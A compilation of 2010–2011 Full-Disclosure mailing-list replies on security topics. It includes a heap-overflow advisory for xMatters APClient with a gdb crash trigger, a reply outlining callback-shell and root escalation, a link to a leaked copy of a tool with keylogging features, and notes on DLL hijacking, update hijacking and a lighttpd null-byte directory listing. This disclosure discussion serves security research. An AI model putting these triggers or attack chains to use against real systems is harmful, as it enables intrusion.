http://isc.sans.org/diary.html?storyid=10312; On Wed, May 18, 2011 at 11:07 PM, Eric dkn...@gmail.com wrote: Greetings, Has anyone ever noticed, the sort of DNS queries when you fire/running Google-chrome? The DNS queries for domain names likes: bsjghxplor hrrtjswxtt epjyptuure etc. Behavior has been observed on Linux as well as Windows systems. See the attached screenshot of wireshark dump. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
Hi, just a quick question, do those exploits you mention work in a jailbroken device? I'm running Linux Leopard lOS 4.3 on my iAndroid tablet. On Wed, May 18, 2011 at 11:41 AM, Joxean Koret joxeanko...@yahoo.es wrote: Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have exploits for Linux XP. I would like to know is there any local root exploit exist for linux kernel 2011 . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
Is the suid bit set on that binary? Otherwise, unless I'm missing something it doesn't seem to be exploitable by an attacker... On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco jsa...@insecurityresearch.comwrote: Information Name : Heap Buffer Overflow in xMatters AlarmPoint APClient Version: APClient 3.2.0 (native) Software : xMatters AlarmPoint Vendor Homepage : http://www.xmatters.com Vulnerability Type : Heap Buffer Overflow Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin Severity : High Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com Description -- The AlarmPoint Java Server consists of a collection of software components and software APIs designed to provide a flexible and powerful set of tools for integrating various applications to AlarmPoint. Details --- AlarmPoint APClient is affected by a Heap Overflow vulnerability in version APClient 3.2.0 (native) A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as the POSIX malloc() call. https://www.owasp.org/index.php/Heap_overflow Exploit as follow: Submit a malicious file cointaining the exploit root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$ ./APClient.bin --submit-file maliciousfile.hex or (gdb) run `python -c 'print \x90*16287'` Starting program: /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 'print \x90*16287'` Program received signal SIGSEGV, Segmentation fault. 0x0804be8a in free () (gdb) i r eax0xa303924170932516 ecx0xbfb8 49080 edx0xa303924170932516 ebx0x8059438134583352 esp0xbfff3620 0xbfff3620 ebp0xbfff3638 0xbfff3638 esi0x8059440134583360 edi0x80653f0134632432 eip0x804be8a0x804be8a free+126 eflags 0x210206 [ PF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) Solution --- No patch are available at this time. Credits --- Manual discovered by Insecurity Research Labs Juan Sacco - http://www.insecurityresearch.com -- -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
Precisely. The poc triggers the bug by passing a very long command line argument, so it's assumed the attacker already has executed code. The only way this is exploitable is if the binary has suid (then the attacker can elevate privileges) or the command can be executed remotely (and the attacker additionaly cannot execute any other commands, but can mysteriously control the arguments). Unless either scenario is researched (and nothing in the advisory tells me so) I call bullshit. On Thu, Apr 28, 2011 at 6:09 PM, valdis.kletni...@vt.edu wrote: On Thu, 28 Apr 2011 14:40:22 -0300, Mario Vilas said: Is the suid bit set on that binary? Otherwise, unless I'm missing something it doesn't seem to be exploitable by an attacker... Who cares? You got code executed on the remote box, that's the *hard* part. Use that to inject a callback shell or something, use *that* to get yourself a shell prompt. At that point, download something else that exploits you to root - if you even *need* to, as quite often the Good Stuff is readable by non-root users. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] password.incleartext.com
Actually, if they can get the data back (be it because it's stored in plaintext or in obfuscated plaintext) then it's not secure. Obfuscation doesn't make it more secure, or any less plaintext. On Wed, Apr 6, 2011 at 11:01 AM, Romain Bourdy achil...@gmail.com wrote: Hi Full-Disclosure, Just my two cents but ... the fact they can give your password back doesn't mean it's stored in cleartext, just that it's not hashed but encrypted with some way to get the original data back, this doesn't mean at all it's not secured, even though in most case it's not. -Romain On Wed, Apr 6, 2011 at 1:36 PM, maksim.file...@fuib.com wrote: Kinda plaintextoffenders.com? wbr, - Max full-disclosure-boun...@lists.grok.org.uk wrote on 01.04.2011 02:17:24: Inc leartext st...@incleartext.com Sent by: full-disclosure-boun...@lists.grok.org.uk 01.04.2011 13:14 To full-disclosure@lists.grok.org.uk cc Subject [Full-disclosure] password.incleartext.com Hi FD, Just launched a new website to keep a list of websites storing passwords in clear text, so far the database is small but feel free to add some: http://password.incleartext.com/ Cheers, Inc Leartext___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “My daughter was asked by a little old lady in a London hotel restaurant what her daddy did - she answered, ‘He’s a pirate.’ I was very proud of that answer.” - *Johnny Depp* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
Actually, when the tool was originally released it wasn't free (strings attached or not), but they tried to charge $500 per license as a closed source product. http://seclists.org/fulldisclosure/2010/Sep/283 So at any rate some people have been complaining over and over for the use of the word free since version 2.0. http://seclists.org/fulldisclosure/2011/Jan/504 BTW I do not mind people making yet another UI for Metasploit, but this free but not free thing creates a dishonest image that could have easily been avoided by following the same practice every other donationware follows: let users download it freely and decide whether to donate or not based on their experience with the software. On Fri, Apr 1, 2011 at 12:36 PM, Esteban Cañizal este...@canizal.com.arwrote: Yes i do agree with you! everybody can comment and disagree as much as they wish what I am trying to say is that there is a bunch of people that always complains about the same things that have been already answered, if you decided you don't like the tool just don't use it and find a better one, at least that is what i usually do. I read the same people saying the same things that have been said when the tool was released (1.0) -- Esteban Cañizal ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “My daughter was asked by a little old lady in a London hotel restaurant what her daddy did - she answered, ‘He’s a pirate.’ I was very proud of that answer.” - *Johnny Depp* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Insect Pro 2.1 : New version release
It seems to be a different version. IMHO if I have to pay to download it then it's not really free. Insect should follow the same donation policy as any open source project - download should be free and donation should be optional. This is probably a non-issue anyway but I feel the word free shouldn't be used in this context, at least I find it misleading... On Tue, Mar 8, 2011 at 10:31 AM, Quentin Ducas quentin@gmail.comwrote: Real free version (no donation needed) here: http://insectpro.highprofilesite.com/ Quentin 2011/3/7 Juan Sacco jsa...@insecurityresearch.com: The Insect Pro 2.1 new version is now accessible on Insecurity Research servers! Get it now to enjoy the positive changes that this update brings, based directly on user feedback Insect Pro is a penetration security auditing and testing software solution designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities and implement active security policies by performing penetration tests across their infrastructure and applications. Insect Pro 2.1 includes: Minimize to systray to work in background Video recording Capture screenshots Keylogging feature Command-line based control GUI improved Read full patch notes on our site to learn more about what's new and improved. Also, anyone that has not yet donate to get a license may do it now and obtain a free version of the new stealth keylogger! Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “My daughter was asked by a little old lady in a London hotel restaurant what her daddy did - she answered, ‘He’s a pirate.’ I was very proud of that answer.” - *Johnny Depp* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [CORE-2010-1001] Cisco WebEx .atp and .wrf Overflow Vulnerabilities
Gotta love the team name ;) http://www.goear.com/listen/570f6b5/debede-sumo On Mon, Jan 31, 2011 at 10:17 PM, CORE Security Technologies Advisories advisor...@coresecurity.com wrote: 7. *Credits* These vulnerabilities were discovered and researched by Federico Muttis, Sebastian Tello and Manuel Muradas from Core Security Technologies during Bugweek 2010 as part of the Cisco Baby Cisco! team [2]. The publication of this advisory was coordinated by Pedro Varangot. -- “My daughter was asked by a little old lady in a London hotel restaurant what her daddy did - she answered, ‘He’s a pirate.’ I was very proud of that answer.” - Johnny Depp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell
Oh, fuck this shit. http://rapidshare.com/files/444699301/InsectProFull.zip This is the previous version, you can guess what the new version should be like. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
It would indeed be vulnerable to that, and you're also right about this attack vector being quite small. But IMHO an updates mechanism that signs it's packages it quite easy to implement, so we're talking about getting a tangible benefit from a small effort. Preventing the signing key from being stolen is a different matter entirely - it has to do with the vendor's own network infrastructure security. Unsigned updates, on the other hand, rely on the client network's security, which cannot be controlled by the vendor. In other words, a signed updates mechanism is clearly more secure than an unsigned updates mechanism, even if none of both can be 100% secure, and it comes at very little cost. Also, there's no such thing as a 100% secure system. :) BTW, I don't think the programmers of each application should be developing their own signature code. Never code your own crypto, just use what's available. Also, I believe the operating system should provide the mechanism, not the application. On Sun, Oct 31, 2010 at 3:36 PM, valdis.kletni...@vt.edu wrote: On Sun, 31 Oct 2010 13:09:27 BST, Mario Vilas said: Just signing the update packages prevents this attack, so it's not that hard to fix. Except if a signing key gets compromised, as happened to one Linux vendor recently, causing a lot of kerfluffle... Setting up a proper signing system involves a certain amount of actual cost and effort. And every organization that produces code, be it for-profit proprietary code or free open-source code, has to make resource tradeoffs. Is there any actual *evidence* that hijacking authorized updates is a big enough problem to be worth it? If each year, 5 of their customers get pwned by the sort of attack that Evilgrade does, but 50,000 get pwned by click here popups that code signing won't do squat to prevent, is it really worth their time and effort? Sure, sucks to be one of the 5, but if they instead spend the resources to do something *else* to make their customer's lives better that would benefit thousands rather than the 5 -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
Just signing the update packages prevents this attack, so it's not that hard to fix. On Sat, Oct 30, 2010 at 5:02 PM, valdis.kletni...@vt.edu wrote: On Sat, 30 Oct 2010 04:43:14 +0800, Jacky Jack said: It's now a time for vendors to re-consider their updating scheme. And do what differently, exactly? OK, so it's *possible* to fake out the iTunes update process. But which is easier and more productive: A) Laying in wait for some random to think Wow, I should update iTunes and hijack the process. B) Send out a few hundred thousand spam with a ' From:upd...@apple-itunes-support.comfrom%3aupd...@apple-itunes-support.com ' with a link to a site you control and feed the the sheep some malware. Evilgrade looks like a nice tool to have if you're doing a pen test or a targeted attack and can somehow get the victim to do an update (possibly social engineering), but for any software vendor feeding software updates to Joe Sixpack this threat model is *so* far down the list it isn't funny. Simply compare the number of boxes pwned by (A) and (B) - how many people have gotten pwned because somebody hijacked their update from Symantec or wherever, compared to the number pwned because they got a popup that said Your computer is infected, click here to fix it? Remember - just because a new tool useful for an attacker shows up, does *not* mean it's a game changer for the industry at large. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Rooted CON 2011: Welcome Hex Rays as new sponsor
paranoid Uhm, why the redirection through Facebook? /paranoid 2010/10/21 Román Ramírez pat...@0z0ne.com Hello all, We don't send emails to communicate sponsorships as we undertsand is quite disturbing and we all receive a lot of email. But this is a special situation as I want to transmit a big THANK YOU to the Hex Rays team, and specially to Ilfak Guilfanov, as he has been absolutely kind with us, giving it support as quick as he was able to. IDA Pro es a great product, but the team behind is the greatest. Thanks a lot, Hex Rays http://www.facebook.com/l/e0f03FgjJ4fe1x13sURaCdSeCgQ;www.rootedcon.es/eng/blog/2010/10/new-rooted-con-2011-sponsor-hex-rays.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New tool for pentesting
To be fair, both Canvas and Impact had the same pivoting features years before Metasploit (and yes, that includes the entire Windows API too). It's no wonder really, since Metasploit is newer too (Impact was created some ten odd years ago and Canvas came shortly later, if I'm not wrong). But IMHO if a community, open source project like Metasploit can reach the quality of it's big budget, closed source competitors, that alone is quite impressive! What I think is really wrong here is someone made a poorly designed (at least judging from the GUI), Windows-only commercial tool by ripping off a few public exploits... What's the added value here? What are these people trying to charge money for, exactly? This looks like snake oil to me. On Fri, Sep 17, 2010 at 6:54 PM, rdse...@mtu.edu wrote: Seriously. The only reason CANVAS and IMPACT are still used is because of the 0-days that come packaged with them. Metasploit if far superior not only in exploitation, but post exploitation, persistance, networking pivioting, and just generally being a badass! Can ANYTHING really compare to the meterpreter for pwning windows? They implemented remote kernel calls for gods sake! You have the ENTIRE windows API at your disposal with it, assuming you don't want to use one of the very awesome ruby scripts that come with it to manipulate your tokens or do remote route additions! If I'm going to use any 'enterprise level vulnerability scanner' ::shudders:: it'll be Metasploit express, or MAYBE Nessus. Mainly just my brain though, which costs me nothing! If you're going to try to sell stuff like this, I wouldn't go where ACTUAL security people dwell, I'd go back to the netstumbler forums. You'd have better luck there. On Sep 17, 2010, at 11:31 AM, Eyeballing Weev eyeballing.w...@gmail.com wrote: Looking at that webpage is making me rage. I'm sending him an invoice for a new keyboard. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NMAP Vulnerable to attack
How ironic... On Fri, Sep 10, 2010 at 11:07 PM, valdis.kletni...@vt.edu wrote: On Fri, 10 Sep 2010 22:52:46 +0200, Stefano Angaran said: I think that was a joke You're new here, aren't you? :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL hijacking with ZIP files in email?
if you email a web page, tipically all files are unzipped when the user double clicks on any .html file but I still don't see this as something drastically different from double clicking on exe files... On Thu, Sep 2, 2010 at 12:45 AM, coderman coder...@gmail.com wrote: On Wed, Sep 1, 2010 at 2:05 PM, paul.sz...@sydney.edu.au wrote: The essence of DLL hijacking is to deliver an innocent file together with a malicious DLL, in the one directory. Would it be possible to do this via email: a ZIP (or similar) archive containing the two files? i don't know of a way to do this with ZIP archives. the daemontools / easycd / related tools which automount ISO and other archive images as drive letters on the host are vulnerable. autorun on/off may add insult to injury with such services... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL hijacking with Autorun on a USB drive
On Fri, Aug 27, 2010 at 5:27 PM, matt m...@attackvector.org wrote: 2) This opens the door for more widespread attacks. In the case of PowerPoint, one could simply find a share on a network that contains a large amount of ppt files and save his/her rogue DLL file in that directory. Then, whenever anyone opens one of the files, the attacker gets immediate access to the victims PC without the victim having any idea. This is not any different from what worms used to do back in 2000... http://dpnm.postech.ac.kr/research/04/nsri/papers/010919-Analysis-Nimda.pdf (See page 4) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WinAppDbg 1.4 is out!
Basically it supports 64 bits Windows, has a few more features, and comes with a crash analyzer. PyDbg on the other hand supports Mac OS and is integrated to PaiMei. So both frameworks have their own advantages. Also the programming API for PyDbg is much simpler (but still powerful), but WinAppDbg's is more complete, documented, and object oriented. So if I were you, I wouldn't rush to port all my already written code to WinAppDbg :) but if you're about to code something new you might want to give it a try! On Tue, Aug 24, 2010 at 9:42 PM, Aleksandr Yampolskiy ayampols...@gilt.com wrote: How is it different from pydbg? Sent from my Blackberry handheld. - Original Message - From: Mario Vilas mvi...@gmail.com To: bugt...@securityfocus.com bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk; Python-Win32 List python-wi...@python.org Sent: Tue Aug 24 09:00:59 2010 Subject: WinAppDbg 1.4 is out! What is WinAppDbg? == The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for this purposes. Current features also include disassembling x86 native code (using the open source diStorm project, see http://ragestorm.net/distorm/), debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing. What's new in this version? === In a nutshell... * fully supports Python 2.4 through 2.7 * fully supports Windows XP through Windows 7, 32 and 64 bit editions * crash report tool now supports MSSQL (requires pyodbc) * now supports downloading debugging symbols from Microsoft (thanks Neitsa!) * new tool: sehtest.py (Windows SEH buffer overflow jump address bruteforcer, inspired by the same tool by Nicolas Economou) * the tutorial is now available in chm and pdf formats * now with only one MSI installer for all supported Python versions * added support for diStorm 3 (falls back to the old version if not found) * now using cerealizer instead of pickle whenever possible * added new command to the command line debugger to show the SEH chain * a few more anti-anti-debug tricks were added, still more to go! * several improvements to the Window instrumentation classes * more code examples * more Win32 API wrappers * lots of miscellaneous improvements, more documentation and bugfixes as usual! Entire changelog for all versions (slow!): http://p.sf.net/winappdbg/changelog Where can I find WinAppDbg? === Project homepage: - http://tinyurl.com/winappdbg Download links: --- Windows installer (32 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win32.exe/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win32.msi/download Windows installer (64 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win-amd64.exe/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win-amd64.msi/download Source code http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.zip/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.tar.bz2/download Documentation: -- Online http://winappdbg.sourceforge.net/doc/v1.4/tutorial http://winappdbg.sourceforge.net/doc/v1.4/reference For download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-tutorial-1.4.chm/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-reference-1.4.chm/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-tutorial-1.4.pdf/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-reference-1.4.pdf/download -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http
[Full-disclosure] WinAppDbg 1.4 is out!
What is WinAppDbg? == The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for this purposes. Current features also include disassembling x86 native code (using the open source diStorm project, see http://ragestorm.net/distorm/), debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing. What's new in this version? === In a nutshell... * fully supports Python 2.4 through 2.7 * fully supports Windows XP through Windows 7, 32 and 64 bit editions * crash report tool now supports MSSQL (requires pyodbc) * now supports downloading debugging symbols from Microsoft (thanks Neitsa!) * new tool: sehtest.py (Windows SEH buffer overflow jump address bruteforcer, inspired by the same tool by Nicolas Economou) * the tutorial is now available in chm and pdf formats * now with only one MSI installer for all supported Python versions * added support for diStorm 3 (falls back to the old version if not found) * now using cerealizer instead of pickle whenever possible * added new command to the command line debugger to show the SEH chain * a few more anti-anti-debug tricks were added, still more to go! * several improvements to the Window instrumentation classes * more code examples * more Win32 API wrappers * lots of miscellaneous improvements, more documentation and bugfixes as usual! Entire changelog for all versions (slow!): http://p.sf.net/winappdbg/changelog Where can I find WinAppDbg? === Project homepage: - http://tinyurl.com/winappdbg Download links: --- Windows installer (32 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win32.exe/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win32.msi/download Windows installer (64 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win-amd64.exe/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win-amd64.msi/download Source code http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.zip/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.tar.bz2/download Documentation: -- Online http://winappdbg.sourceforge.net/doc/v1.4/tutorial http://winappdbg.sourceforge.net/doc/v1.4/reference For download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-tutorial-1.4.chm/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-reference-1.4.chm/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-tutorial-1.4.pdf/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-reference-1.4.pdf/download ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] On the iPhone PDF and kernel exploit
http://jailbreakme.com/_/ gives me a 404 Not Found error. There were a few vulnerabilities in lighthttpd related to the %00 character but after googling a while I couldn't find this particular one. I guess it's worth reporting if this still works in the current version (1.5.0). On Thu, Aug 5, 2010 at 12:04 PM, Sabahattin Gucukoglu m...@sabahattin-gucukoglu.com wrote: On 5 Aug 2010, at 10:13, Ryan Sears wrote: Well I'm no expert but I'm going to see if I can reverse engineer the PDFs used for jailbreaking (obviously I'd need an ARM assembly book or someone who knows it :-P) and figure out exactly what they're doing. I agree with was said earlier, I'm not saying they're doing something malicious, but if I wanted to backdoor thousands of phones this is how I'D do it. It didn't work for me. I use VoiceOver, which didn't like the (fake) slider implemented in javascript, so I had to spoof the UA on a Mac, grab the source, inspect it, grab the PDF, email it to myself ... it didn't work. :-( iPhone 3GS = 2,1, yes? Either way anyone interested in doing the same I've discovered that the webserver (lighthttpd 1.4.19) drops the index if you GET a null byte. http://www.jailbreakme.com/%00 Nice, did you just try it in case it might work, or does this constitute a vuln that wants fixing in current lighttpd? It's just that indexing happens to be enabled on http://jailbreakme.com/_/ too. Also if anyone knows how to get in contact with any of the admins for the site (or anyone who runs it for that matter) please either let me know or let them know. Ditto, thanks. Cheers, Sabahattin ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google auto redirect
did you actually try the link? cause it worked for me... On Wed, Jul 14, 2010 at 12:14 PM, McGhee, Eddie eddie.mcg...@ncr.comwrote: come on what's funny about encoding a url? you don't see this as a vuln? REALLY geez peace... -- *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Marshall Whittaker *Sent:* 13 July 2010 21:17 *To:* full-disclosure@lists.grok.org.uk *Subject:* [Full-disclosure] Google auto redirect I don't really consider this a vulnerability, but it's funny. http://www.google.com/search?q=%79%61%68%6F%6Fie=ISO-8859-1source=hphl=enbtnI=I%26%2339;%69%6D%2B%46%65%65%6C%69%6E%67%2B%4C%75%63%6B%79 -- oxagast ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/